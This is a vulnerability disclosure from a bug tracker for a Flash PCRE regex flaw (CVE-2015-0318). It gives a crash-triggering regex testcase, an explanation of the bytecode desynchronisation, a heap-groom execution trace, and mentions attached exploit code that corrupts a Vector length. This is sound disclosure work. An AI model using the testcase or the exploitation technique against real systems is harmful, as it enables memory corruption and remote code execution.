Starred by 4 users
Status: Fixed
Closed: Feb 2015
Flash PCRE regex compilation logic issue
Project Member Reported by markbrand@google.com, Nov 25 2014
There’s a logic error in the PCRE engine version used in Flash that allows the execution of arbitrary PCRE bytecode, with potential for memory corruption and RCE. 

The issue is in the handling of the \c escape sequence (single ASCII character) when it is followed by a multibyte UTF-8 character. Several code paths in pcre_compile.cpp then interpret the resulting bytecode differently, which opens up several interesting possibilities.

The simplest testcase that will crash in an ASAN build of avmshell is the following:

\\c\xd0\x80+(?1)

The first component is a forced-ascii literal, which then takes the first byte of our multibyte character

\       <---- start of escape sequence
c       <---- single ascii character
\xd0    <---- this must be our ascii character

\x80    <---- look, another single character
+       <---- simplify this expression to a repeated \x80

At this point, our emitted bytecode is the following:

OP_BRA  <---- (1) standard opening for start of regex
OP_CHAR <---- (2) one character
\xd0
OP_PLUS <---- (3) one character, repeated
\x80

Now when we get to (?1), we need to search for group number one. The search proceeds as follows:

OP_BRA  <---- (1) this is not our group, it doesn't capture

OP_CHAR <---- (2) a character, we need to check if it's multibyte
\xd0    <------------- it's a multibyte utf8 character
OP_PLUS <------------- better skip the second byte

\x80    <---- (3) don't know this one - let's go look up how long it is in our lookup table...

Highest opcode is 109, so we read off the end of the lookup table.
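
The desynchronisation described above can be sketched with a toy bytecode walker. This is an illustration only, not PCRE's find_bracket: the opcode numbers, the length table, and the names toy_first_bad_opcode and utf8_extra_bytes are all assumptions made up for this sketch. The walker skips UTF-8 continuation bytes after a character opcode, as the search does, and reports the first offset at which a byte that is not a known opcode would be used to index the length table.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy opcode numbering: hypothetical values, not the ones PCRE uses. */
enum { T_END = 0, T_BRA = 1, T_CHAR = 2, T_PLUS = 3, T_OPCODE_COUNT = 4 };

/* Bytes occupied by each toy opcode, including a one-byte operand if any. */
static const uint8_t toy_op_lengths[T_OPCODE_COUNT] = { 1, 1, 2, 2 };

/* Continuation bytes implied by a UTF-8 lead byte (0 if not a lead byte). */
static size_t utf8_extra_bytes(uint8_t b)
{
    if (b >= 0xf0) return 3;
    if (b >= 0xe0) return 2;
    if (b >= 0xc0) return 1;
    return 0;
}

/* Walk the toy bytecode. Returns the offset of the first byte that would be
 * treated as an opcode without being one, or len if no such byte is reached. */
size_t toy_first_bad_opcode(const uint8_t *code, size_t len)
{
    assert(code != NULL);
    size_t i = 0;
    while (i < len) {
        uint8_t op = code[i];
        if (op >= T_OPCODE_COUNT) return i;  /* would index past the table */
        if (op == T_END) break;
        size_t step = toy_op_lengths[op];
        /* Character operands may be multibyte: skip the continuation bytes. */
        if ((op == T_CHAR || op == T_PLUS) && i + 1 < len)
            step += utf8_extra_bytes(code[i + 1]);
        i += step;
    }
    return len;
}
```

For the toy equivalent of the bytecode above (BRA, CHAR, \xd0, PLUS, \x80) the walk skips the PLUS byte as if it were a continuation byte and stops at offset 4, the \x80 byte.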

We can abuse this on a normal non-ASAN build: the array is followed by a table of strings, and _pcre_OP_lengths[0x80] returns an instruction length of 110.

+ 110   <---- (4) somewhere on the heap...

The search then continues until it finds the bytecode for the group we were looking for, or hits OP_END or a NULL. The compiler then fills in the opcode for a jump to wherever that group was found.

See attached for an execution trace demonstrating a heap-groom and arbitrary regex bytecode execution (the regex used is slightly different to the above poc). Prior to this trace, a groom has been performed to leave a gap of size 335 followed by a crafted buffer.

compile_branch  <---- first compile to establish length of regex
start_byte 41 (A)
start_byte 41 (A)
… snip …
start_byte 41 (A)
start_byte 41 (A)
start_byte 28 (()
compile_branch
start_byte 5c (\)
start_byte 80 (�)
start_byte 2a (*)
start_byte 29 ())
start_byte 3f (?)
start_byte 28 (()
start_byte 00 ()
malloc(335) [0x602a0001c8e0 - 0x602a0001ca2f] <--- note legitimate buffer ends at ca2f
compile_branch <---- second compile to produce regex bytecode in the buffer allocated above
start_byte 41 (A)
start_byte 41 (A)
… snip ...
start_byte 41 (A)
start_byte 41 (A)
start_byte 28 (()
compile_branch
start_byte 5c (\)
start_byte 80 (�)
start_byte 2a (*)
start_byte 29 ())
start_byte 3f (?)
start_byte 28 (()
from here1
code 0x602a0001c910 93 3 <---- print in find_bracket, last no. is _pcre_OP_lengths[c]
code 0x602a0001c913 27 2
code 0x602a0001c915 27 2
… snip ...
code 0x602a0001ca0f 27 2
code 0x602a0001ca11 27 2
code 0x602a0001ca13 102 1
code 0x602a0001ca14 94 1
code 0x602a0001ca19 27 2
code 0x602a0001ca1c 30 2
code 0x602a0001ca1e 128 110 <---- whoops
code 0x602a0001ca8c 35 2    <---- now outside legitimate heap buffer
code 0x602a0001ca8e 35 2
… snip ...
exec 0x602a0001c910 93 [0x601a0000cea0] <--- regex execution starts
exec 0x602a0001c913 27 [0x601a0000cea0]
exec 0x602a0001c915 27 [0x601a0000cea1]
… snip ....
exec 0x602a0001ca0f 27 [0x601a0000cf1e]
exec 0x602a0001ca11 27 [0x601a0000cf1f]
exec 0x602a0001ca13 102 [0x601a0000cf20]
exec 0x602a0001ca14 94 [0x601a0000cf20]
exec 0x602a0001ca19 27 [0x601a0000cf20]
exec 0x602a0001ca22 92 [0x601a0000cf20]
exec 0x602a0001ca25 81 [0x601a0000cf20]
exec 0x602a0001cae9 35 [0x601a0000cf20] <--- regex execution in our buffer of ‘#’
exec 0x602a0001caeb 35 [0x601a0000cf20]
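
The addresses in the trace can be checked with a little arithmetic. The sketch below uses only numbers printed in the trace; the helper name toy_in_allocation is an assumption for illustration. It treats the allocation as the half-open range [start, start + size).

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* True when addr lies inside the half-open range [start, start + size). */
bool toy_in_allocation(uint64_t start, uint64_t size, uint64_t addr)
{
    assert(start <= UINT64_MAX - size);  /* the range must not wrap around */
    return addr >= start && addr - start < size;
}
```

With start 0x602a0001c8e0 and size 335, start + size is 0x602a0001ca2f, the end address printed next to malloc. The byte 128 at 0x602a0001ca1e is still inside the buffer, but stepping 110 bytes from there gives 0x602a0001ca8c, which is outside it.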

A patch for this issue against the github avmplus source is attached.
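
The contents of the attached patch are not reproduced in this report. As a rough sketch of one way the problem could be closed off, assuming the fix is to refuse a non-ASCII byte after \c, a check along the following lines would reject the testcase before any bytecode is emitted. The function toy_control_escape_ok is hypothetical and does not exist in PCRE or avmplus.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical check: pos is the index of the backslash of a \c escape.
 * Returns true only if the escape is followed by a non-NUL ASCII byte. */
bool toy_control_escape_ok(const uint8_t *pattern, size_t len, size_t pos)
{
    assert(pattern != NULL);
    /* Need room for the backslash, the 'c', and one operand byte. */
    if (len < 3 || pos > len - 3) return false;
    if (pattern[pos] != '\\' || pattern[pos + 1] != 'c') return false;
    uint8_t operand = pattern[pos + 2];
    /* Bytes >= 0x80 are part of a multibyte UTF-8 sequence, not ASCII. */
    return operand != 0 && operand < 0x80;
}
```

Under this assumption the pattern bytes \ c \xd0 \x80 + fail the check because \xd0 is not ASCII, while \cA passes.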

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

 
cunicode.patch
433 bytes
Comment 1 by cevans@google.com, Nov 28 2014
Labels: Id-3161
Owner: cevans@google.com
[Setting owner to cevans@google.com. I think we should use owner to represent whoever is doing the comms with the vendor]
Project Member Comment 2 by markbrand@google.com, Dec 17 2014
Updating with additional information sent to vendor in response to request for a crash repro:

It's quite an awkward bug to provide a reliable crash repro for. With the way the Flash heap works, the out-of-bounds reads will almost always result in a silent failure to compile the regex, so to get a crash directly from this issue you will need good instrumentation such as ASAN. One way to see that the bug has occurred is to instrument find_bracket in pcre_compile.cpp to print the pointer that it's currently dereferencing, for example by changing the start of the function to:

static const uschar *
find_bracket(const uschar *code, BOOL utf8, int number)
{
for (;;)
  {
  register int c = *code;
  /* Debug print: the address being read and the byte treated as an opcode. */
  fprintf(stderr, "code %p %i\n", (const void *)code, c);
  if (c == OP_END) return NULL;

The example shown wasn't triggered from ActionScript, though; it came from a custom harness for testing the regex engine, so I don't have an ABC file to hand. The provided regex should still cause an OOB read crash under ASAN or valgrind when called from the RegExp object.

See attached for a partial exploit for this issue in desktop Flash; it uses this vulnerability to get arbitrary bytecode executed (in CompileRegex), and then leverages this to corrupt the length of a Vector.<uint> object on the heap. The provided file will then use this corrupted vector object to write the value 0x41414141 to address 0x40404040. As it requires some heap manipulation, mileage may vary - this has only been tested on the standard Flash on Windows 8.1 x64 running in 32-bit desktop Internet Explorer on my laptop.
poc.7z
11.0 KB
Project Member Comment 3 by markbrand@google.com, Dec 18 2014
Supplied another crash PoC to Adobe.
psirt-3161.tar.gz
2.0 KB
Comment 4 by cevans@google.com, Feb 4 2015
Labels: CVE-2015-0318
Comment 5 by cevans@google.com, Feb 6 2015
Labels: Fixed-2015-Feb-5
Status: Fixed
https://helpx.adobe.com/security/products/flash-player/apsb15-04.html
Comment 6 by cevans@google.com, Feb 12 2015
Labels: -Restrict-View-Commit -Severity-Moderate Severity-High
Making publicly viewable; it's 7 days post-patch and there's a corresponding blog post: http://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html

Also fixing severity to "High"
Project Member Comment 7 by markbrand@google.com, Feb 17 2015
Adding the exploit source for the blog post, as it was pointed out that I forgot to upload it...

Exploit has only been tested on 32-bit desktop IE running on Windows 8.1.
src.tar.gz
8.8 KB
Why does running "\\c\xd0\x80+(?1)" in PCRE 7.2 or 7.1 just fail with "Failed: reference to non-existent subpattern at offset 15"? Was anyone able to reproduce it?